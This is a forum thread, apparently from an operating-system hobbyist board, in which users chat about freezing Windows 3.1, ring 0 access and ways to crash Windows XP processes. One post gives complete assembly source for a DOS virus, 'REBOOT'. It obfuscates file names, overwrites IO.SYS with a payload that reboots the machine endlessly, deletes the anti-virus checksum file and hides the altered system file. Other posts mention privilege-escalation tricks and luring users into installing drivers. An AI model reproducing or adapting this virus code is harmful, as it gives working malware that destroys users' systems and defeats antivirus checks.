windows 3.1 fun

[VolTeK]

thats what i was thinking, trash data or dll's stored in memory. maybe even the kernel, i will try that tonight, see what happens and report back to you guys

[Combuster]

History told that Windows for workgroups was cooperatively scheduled. There was a program that could play wave files over the PC speaker, and to do so it had to lockstep with the PIT. Which meant that other programs were denied processor time because it didn't use system calls, which would otherwise have yielded the timeslice. And that was exactly what happened - the computer froze for the duration of the wavefile. Even the mouse wouldn't move.

[Colonel Kernel]

IIRC, Windows 3.1 can also be ran in the infamous 16-bit protected mode for 80286+ CPUs, not just in real mode.

Actually, 3.1 ran in 16-bit protected mode most of the time. There hasn't been a real mode Windows since 2.0-ish. Just about everyone gets these details wrong, because Windows had a complex evolution. I have tried to set it straight several times on these forums -- do a search and you'll find some interesting stuff.

[VolTeK]

combustor: wow even the mouse froze, and the wave file still played, cool.

(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?

[dude101]

combustor: wow even the mouse froze, and the wave file still played, cool.

(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?

If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.

[kmtdk]

well
one of my friends showed me some code, to make your own code in windows xp run in ring 0 !!
so that is might what you need

and then in ring 0, just "CLI" then windows is DOWN

however, i have not tried it ..

KMT dk

[dude101]

well
one of my friends showed me some code, to make your own code in windows xp run in ring 0 !!
so that is might what you need

and then in ring 0, just "CLI" then windows is DOWN

however, i have not tried it ..

KMT dk

Well yea if your running in ring 0 you can do anything lol. Device drivers run in kernel space.

[VolTeK]

how do you run your program in windows XP ring 0?

[earlz]

combustor: wow even the mouse froze, and the wave file still played, cool.

(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?

If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.

or have the user say "yes" to some prompt about accounts.. or wait that's vista... assuming you are running as an administrator, fully possible.. install a driver... you can talk windows users into anything. "There is an updated driver for your monitor that will make it show cute little bunnies. just say yes to the following prompt"... Also, isn't there a way to start applications/drivers at the very core of startup? One guy charged like $800 or somethign for ramdisk software for windows. I asked him why it was so expensive(and yes, he did sell it, and well) and he said because it was loaded as one of the base drivers of windows, meaning the kernel could use it at a very early stage. Because of this however, he had to write his own NTFS code because at that early of a stage, who knows if the "real" NTFS driver is loaded yet or not...or maybe it was BS to shut me up... lol

oh yea, and ring 0 in XP involves using a special hack with the "at" command so that you start a new process as "SYSTEM"
I haven't tried it myself though...

[Combuster]

In your case, I suggest throwing your computer out the window to crash windows, csrss.exe included

*ducks and runs*

[Masterkiller]

combustor: wow even the mouse froze, and the wave file still played, cool.

(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?

If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.

So... ReadProcessMemory and WriteProcessMemory are bug in the OS?

[Troy Martin]

Hey Ghost, the code in your signature is wrong... It jumps to segment 8000h, which would be linear 80000h... but I shouldn't have to tell you that, now should I?

[earlz]

combustor: wow even the mouse froze, and the wave file still played, cool.

(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?

If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.

So... ReadProcessMemory and WriteProcessMemory are bug in the OS?

Well there is that.. doubt it allows you to write to SYSTEM processes though, and you have to be administrator to go from user A process to user B process... (Really I now fully appreciate how dangerous it is running as "root" in windows, as everyone does just about)

[BillHudson]

Here try this, I wrote it back in the 1800's or so. It just keeps rebooting...

Code: Select all

; REBOOT - Virus written by Bill Hudson

P8086          ;select the processor
MODEL TINY     ;always must be TINY model

DATASEG

FName1  DB      'c'-20                  ; File to be INFECTED (CODED)
        DB      ':'-20,'\'-20,'i'-20,'o'-20
        DB      '.'-20,'s'-20,'y'-20,'s'-20

;FName1  DB      'c:\io.sys'             ; File to be INFECTED
EOF     DW      2400h

FName2  DB      'c'-20                  ; MS Anti-Virus CHECKSUMS file
        DB      ':'-20,'\'-20,'c'-20,'h'-20
        DB      'k'-20,'l'-20,'i'-20,'s'-20
        DB      't'-20,'.'-20,'m'-20,'s'-20

;FName2  DB      'c:\chklist.ms'         ; MS Anti-Virus CHECKSUMS file
        DW      1A00h

UDATASEG

   DW 100H DUP (?)
MyStack  LABEL WORD

CODESEG
   STARTUPCODE

   MOV SP,OFFSET MyStack
   
   CALL DoIt

   MOV AH,4CH				; AL has DOS Exit Code in it (see end of DOIT)
   INT 21H				; Exit to DOS
   RET

DoIt PROC NEAR

        PUSH    AX BX CX DX                

        MOV     BX,OFFSET FName1
        MOV     CX,9
Decode1:        
        ADD     BYTE PTR [BX],20
        INC     BX
        LOOP    DeCode1
        
        MOV     BX,OFFSET FName2
        MOV     CX,13
Decode2:        
        ADD     BYTE PTR [BX],20
        INC     BX
        LOOP    DeCode2
        
        MOV     AX,4301h                ; Set ATTRIB
        MOV     CX,0                    ; None
        MOV     DX,OFFSET FName1        ; IO.SYS
        INT     21h

        MOV     EOF,1A00h               ; Change for open file
        
        MOV     AX,3D02h                ; OPEN for WRITE
        INT     21h
        MOV     BX,AX                   ; Get HANDLE in BX
        
        MOV     AX,4200h                ; SEEK byte
        XOR     CX,CX
        MOV     DX,0238h
        INT     21h

        MOV     AX,4000h                ; Write to file
        MOV     CX,OFFSET ReBoot - OFFSET EndMsg  ; VIRUS length
        MOV     DX,OFFSET ReBoot        ; VIRUS        
        PUSH    DS                      ; Save data seg
        PUSH    CS                      ; Get code seg
        POP     DS                      ; In data seg
        INT     21h                     
        POP     DS                      ; Restore data seg

        MOV     AX,3E00h                ; Close IO.SYS
        INT     21h

        MOV     AX,4100h                ; Delete file
        MOV     DX,OFFSET Fname2        ; CHKLIST.MS        
        INT     21h

        MOV     EOF,2400h               ; Change for Attrib
        
        MOV     AX,4301h                ; Set ATTRIB
        MOV     CX,7                    ; SYSTEM - HIDDEN - READONLY
        MOV     DX,OFFSET FName1
        INT     21h
        POP     DX CX BX AX
   
   MOV AL,1				; DOS Exit Code
   RET
DoIt ENDP

ReBoot:
        MOV     AX,0B800h               ; Screen seg
        MOV     ES,AX                   ; Into ES
        MOV     BX,609                  ; Location of Msg (HARD-CODED)
                                        ; ReBoot is at 568 (0238h) 
        MOV     DI,3077                 ; Screen Address
        MOV     AL,17h                  ; Attribute
        MOV     CX,44                   ; 44 bytes
        CLD                             ; INC DI after STOSW
ReBoot1:
        MOV     AH,CS:[BX]              ; Get a byte from message
        ADD     AX,1400h                ; ADD 20 to DECODE
        STOSW                           ; Write byte to screen
        INC     BX                      ; Next byte in Msg 
        LOOP    ReBoot1
        
        MOV     AX,40h                  ; Seg 40 BIOS DATA AREA
        MOV     ES,AX                   ; In ES
        MOV     ES:72h,1200h            ; REBOOT FLAG
        INT     19H                     ; REBOOT
EndReBoot:
Msg:    
        DB      'Y'-20,'o'-20,'u'-20,'r'-20,' '-20 
        DB      's'-20,'y'-20,'s'-20,'t'-20,'e'-20
        DB      'm'-20,' '-20,'h'-20,'a'-20,'s'-20 
        DB      ' '-20,'b'-20,'e'-20,'e'-20,'n'-20 
        DB      ' '-20,'I'-20,'N'-20,'F'-20,'E'-20
        DB      'C'-20,'T'-20,'E'-20,'D'-20,' '-20 
        DB      'b'-20,'y'-20,' '-20,'R'-20,'E'-20
        DB      'B'-20,'O'-20,'O'-20,'T'-20,'!'-20
        DB      '!'-20,'!'-20,' '-20,' '-20
EndMsg:

; MSG:	DB	'Your system has been INFECTED by REBOOT!!!  '

END

[VolTeK]

troy: so? i just put random stuff down for a joke, some times my random stuff are wrong, doesnt matter, its funny right?